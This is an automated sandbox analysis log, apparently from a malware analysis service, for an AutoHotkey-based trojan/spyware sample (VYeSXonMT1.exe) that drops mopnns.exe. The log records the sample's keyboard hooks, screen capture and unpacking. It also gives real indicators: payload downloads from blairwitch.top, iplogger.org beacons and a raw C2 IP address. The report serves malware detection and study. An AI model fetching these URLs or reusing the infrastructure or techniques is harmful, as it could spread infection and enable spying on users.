Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_real
Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470406692.0000000002A0C000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469912099.0000000002838000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470406692.0000000002A0C000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469912099.0000000002838000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: mopnns.exe, 00000004.00000002.469658962.00000000027FC000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470234217.00000000029CF000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.471773711.00000000036ED000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469757454.0000000002822000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472682527.00000000037B9000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470406692.0000000002A0C000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.472956135.0000000003800000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469912099.0000000002838000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470305805.00000000029F6000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470893581.00000000034CA000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown

DNS traffic detected: queries for: iplogger.org

Source: C:\Users\user\Desktop\VYeSXonMT1.exe

Code function: 0_2_004545D0 __wcstoi64,InternetOpenW,InternetOpenUrlW,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetReadFile,InternetReadFile,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,InternetReadFile,InternetReadFileExA,InternetReadFileExA,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,DeleteFileW,

Source: global traffic	HTTP traffic detected: GET /1mjvg7 HTTP/1.1Cache-Control: no-cache, no-storeConnection: Keep-AlivePragma: no-cacheAccept: /If-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMTUser-Agent: ( Windows 10 Enterprise \| x64 \| Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz \| Windows Defender \| Chrome )Host: iplogger.org
Source: global traffic	HTTP traffic detected: GET /1mhvg7 HTTP/1.1Cache-Control: no-cache, no-storeConnection: Keep-AlivePragma: no-cacheAccept: /If-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMTUser-Agent: ( Windows 10 Enterprise \| x64 \| Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz \| Windows Defender \| Chrome )Host: iplogger.org
Source: global traffic	HTTP traffic detected: GET /jollion/apines.exe HTTP/1.1User-Agent: AutoHotkeyHost: blairwitch.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /work/mix.exe HTTP/1.1User-Agent: AutoHotkeyHost: blairwitch.topCache-Control: no-cache

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Nov 2021 17:23:39 GMTServer: Apache/2.4.38 (Debian)Content-Length: 276Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 62 6c 61 69 72 77 69 74 63 68 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.38 (Debian) Server at blairwitch.top Port 80</address></body></html>

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.15
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.15

Source: mopnns.exe, 00000004.00000002.469912099.0000000002838000.00000004.00000001.sdmp	String found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"DivX Web Player","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"Facebook Video","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"Chrome PDF Viewer","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"Chrome PDF Plugin","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"Google Earth","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"Google Talk","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"IBMJava*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-java
Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmp	String found in binary or memory: rm9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)

Source: unknown	HTTPS traffic detected: 5.9.162.45:443 -> 192.168.2.6:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.9.162.45:443 -> 192.168.2.6:49769 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to register a low level keyboard hook

Show sources

Source: C:\Users\user\Desktop\VYeSXonMT1.exe

Code function: 0_2_00409200 SetWindowsHookExW 0000000D,Function_00004BF0,00400000,00000000

Source: C:\Users\user\Desktop\VYeSXonMT1.exe

Code function: 0_2_0040F250 __wcsnicmp,__wcsnicmp,GetWindowThreadProcessId,AttachThreadInput,GetKeyboardLayout,GetTickCount,GetCurrentThreadId,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetGUIThreadInfo,GetWindowThreadProcessId,GetTickCount,BlockInput,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,_wcschr,_wcschr,__wcsnicmp,__wcsnicmp,_wcschr,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsicoll,PostMessageW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,__wcsnicmp,__wcsnicmp,__fassign,PostMessageW,PostMessageW,PostMessageW,__itow,PostMessageW,_free,GetTickCount,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetKeyState,GetForegroundWindow,GetWindowThreadProcessId,AttachThreadInput,BlockInput,GetForegroundWindow,GetWindowThreadProcessId,

Source: C:\Users\user\Desktop\VYeSXonMT1.exe

Code function: 0_2_0043A490 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,ReleaseDC,SelectObject,DeleteDC,DeleteObject,_free,GetPixel,ReleaseDC,

Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: 0_2_004013F4 GlobalUnlock,CloseClipboard,SetTimer,GetTickCount,GetTickCount,GetMessageW,GetTickCount,GetFocus,TranslateAcceleratorW,GetKeyState,GetWindowLongW,IsWindowEnabled,GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,IsDialogMessageW,ShowWindow,GetForegroundWindow,GetWindowThreadProcessId,GetClassNameW,KillTimer,DragQueryFileW,DragFinish,GetTickCount,DragFinish,DragFinish,_wcsncpy,_wcsncpy,GetTickCount,_wcsncpy,GetTickCount,IsDialogMessageW,SetCurrentDirectoryW,TranslateAcceleratorW,TranslateMessage,DispatchMessageW,
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: 0_2_0040F250 __wcsnicmp,__wcsnicmp,GetWindowThreadProcessId,AttachThreadInput,GetKeyboardLayout,GetTickCount,GetCurrentThreadId,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetGUIThreadInfo,GetWindowThreadProcessId,GetTickCount,BlockInput,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,_wcschr,_wcschr,__wcsnicmp,__wcsnicmp,_wcschr,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsnicmp,__wcsicoll,PostMessageW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetTickCount,GetTickCount,PeekMessageW,GetTickCount,__wcsnicmp,__wcsnicmp,__fassign,PostMessageW,PostMessageW,PostMessageW,__itow,PostMessageW,_free,GetTickCount,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetKeyState,GetForegroundWindow,GetWindowThreadProcessId,AttachThreadInput,BlockInput,GetForegroundWindow,GetWindowThreadProcessId,
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: 0_2_0040F686 GetTickCount,GetTickCount,PeekMessageW,GetTickCount,_wcschr,_wcschr,__wcsnicmp,_free,GetKeyState,GetKeyState,GetKeyState,GetForegroundWindow,GetWindowThreadProcessId,AttachThreadInput,BlockInput,

System Summary:

Sample or dropped binary is a compiled AutoHotkey binary

Show sources

Source: C:\Users\user\Desktop\VYeSXonMT1.exe

Window found: window name: AutoHotkey

Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: 0_2_004013F4
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: 0_2_00408140
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: 0_2_004201C0
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: 0_2_0040F250
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: 0_2_00442260
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: 0_2_00492262
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: 0_2_0048E2B0
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: 0_2_004183E0
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: 0_2_00482405
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: 0_2_0041C430
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: 0_2_0043A490
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: 0_2_0048949E
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: 0_2_0043F560
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: 0_2_0040C530
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: 0_2_0049D58D
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: 0_2_00482675
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: 0_2_00484620
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: 0_2_004966C5
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: 0_2_004996AF
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: 0_2_0040D770
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_00408C60
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_0040DC11
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_00407C3F
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_00418CCC
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_00406CA0
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_004028B0
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_0041A4BE
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_00418244
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_00401650
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_00402F20
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_004193C4
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_00418788
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_00402F89
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_00402B90
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_004073A0
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_020D2B00
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_020D7856
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_020D18A0
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_020D3170
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_020D31D9
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_020E89D8
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_020DDE61
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_020D7E8F
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_020D8EB0
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_020D6EF0
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_020EA70E
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_020E8F1C
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_020D77C2
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_020E8494
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_020D2DE0

Source: VYeSXonMT1.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: VYeSXonMT1.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: mopnns.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: mopnns.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: VYeSXonMT1.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: String function: 0040E1D8 appears 44 times
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: String function: 020DE428 appears 44 times
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: String function: 00476360 appears 38 times
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: String function: 00430370 appears 48 times
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: String function: 0048FC19 appears 174 times
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: String function: 00430620 appears 137 times

Source: C:\Users\user\Desktop\VYeSXonMT1.exe

Code function: 0_2_00440560: CreateFileW,DeviceIoControl,CloseHandle,

Source: VYeSXonMT1.exe, 00000000.00000002.405540255.00000000004CE000.00000040.00020000.sdmp	Binary or memory string: OriginalFilename vs VYeSXonMT1.exe
Source: VYeSXonMT1.exe, 00000000.00000002.406187807.0000000003A41000.00000040.00000001.sdmp	Binary or memory string: OriginalFilename vs VYeSXonMT1.exe
Source: VYeSXonMT1.exe, 00000000.00000003.374963665.0000000003B10000.00000004.00000001.sdmp	Binary or memory string: OriginalFilename vs VYeSXonMT1.exe

Source: VYeSXonMT1.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: mopnns.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: VYeSXonMT1.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\VYeSXonMT1.exe

File created: C:\Users\user\AppData\Roaming\blair

Jump to behavior

Source: classification engine

Classification label: mal100.spre.troj.spyw.evad.winEXE@5/4@3/3

Source: C:\Users\user\Desktop\VYeSXonMT1.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\VYeSXonMT1.exe

Code function: 0_2_00431310 __wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,_memset,CreateProcessW,CloseHandle,CloseHandle,GetLastError,_memset,__wcsicoll,_wcschr,SetCurrentDirectoryW,_wcschr,_wcschr,GetFileAttributesW,_wcschr,SetCurrentDirectoryW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,GetLastError,FormatMessageW,

Source: C:\Users\user\Desktop\VYeSXonMT1.exe

Code function: 0_2_004781C0 SystemParametersInfoW,LoadLibraryExW,EnumResourceNamesW,FindResourceW,LoadResource,LockResource,GetSystemMetrics,FindResourceW,LoadResource,LockResource,SizeofResource,CreateIconFromResourceEx,FreeLibrary,ExtractIconW,ExtractIconW,

Source: VYeSXonMT1.exe

Virustotal: Detection: 50%

Source: C:\Users\user\Desktop\VYeSXonMT1.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\VYeSXonMT1.exe "C:\Users\user\Desktop\VYeSXonMT1.exe"
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Process created: C:\Users\user\AppData\Roaming\blair\mopnns.exe mopnns.exe
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Process created: C:\Users\user\AppData\Roaming\blair\mopnns.exe mopnns.exe

Source: C:\Users\user\Desktop\VYeSXonMT1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}\InProcServer32

Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\VYeSXonMT1.exe

Code function: 0_2_00456430 CLSIDFromString,CLSIDFromProgID,CLSIDFromString,CoCreateInstance,CoCreateInstance,

Source: C:\Users\user\Desktop\VYeSXonMT1.exe

Code function: 0_2_00440200 _wcsncpy,GetDiskFreeSpaceExW,

Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Users\user\Desktop\VYeSXonMT1.exe

Code function: 0_2_004560C0 CreateToolhelp32Snapshot,Process32FirstW,__wcstoi64,Process32NextW,__wsplitpath,__wcsicoll,Process32NextW,CloseHandle,CloseHandle,CloseHandle,

Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Command line argument: /restart
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Command line argument: /force
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Command line argument: /ErrorStdOut
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Command line argument: A_Args
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Command line argument: A_Args
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Command line argument: AutoHotkey
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Command line argument: AutoHotkey
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Command line argument: Clipboard
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Command line argument: 08A

Source: C:\Users\user\Desktop\VYeSXonMT1.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\VYeSXonMT1.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\Desktop\VYeSXonMT1.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: VYeSXonMT1.exe

Static PE information: More than 200 imports for KERNEL32.dll

Source: VYeSXonMT1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: VYeSXonMT1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: VYeSXonMT1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: VYeSXonMT1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: VYeSXonMT1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: VYeSXonMT1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: VYeSXonMT1.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: _.pdb source: mopnns.exe, 00000004.00000002.468644721.0000000002185000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.475297379.00000000049D0000.00000004.00020000.sdmp, mopnns.exe, 00000004.00000003.402292014.000000000074A000.00000004.00000001.sdmp
Source:	Binary string: C:\xohare dolihupabimig\kaluyix\73.pdb source: VYeSXonMT1.exe
Source:	Binary string: C:\bol\voge hixolub\yebu\losevoduzih-fayipa\weginitowa\gevopit.pdb source: mopnns.exe, 00000004.00000000.396223546.0000000000438000.00000002.00020000.sdmp, mopnns.exe.0.dr
Source:	Binary string: C:\xohare dolihupabimig\kaluyix\73.pdbP source: VYeSXonMT1.exe
Source:	Binary string: 5C:\bol\voge hixolub\yebu\losevoduzih-fayipa\weginitowa\gevopit.pdb0= source: mopnns.exe, 00000004.00000000.396223546.0000000000438000.00000002.00020000.sdmp, mopnns.exe.0.dr

Data Obfuscation:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Unpacked PE file: 0.2.VYeSXonMT1.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Unpacked PE file: 4.2.mopnns.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\VYeSXonMT1.exe

Unpacked PE file: 0.2.VYeSXonMT1.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;

Source: C:\Users\user\Desktop\VYeSXonMT1.exe	Code function: 0_2_00494595 push ecx; ret
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_0041C40C push cs; iretd
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe	Code function: 4_2_00423149 push eax; ret
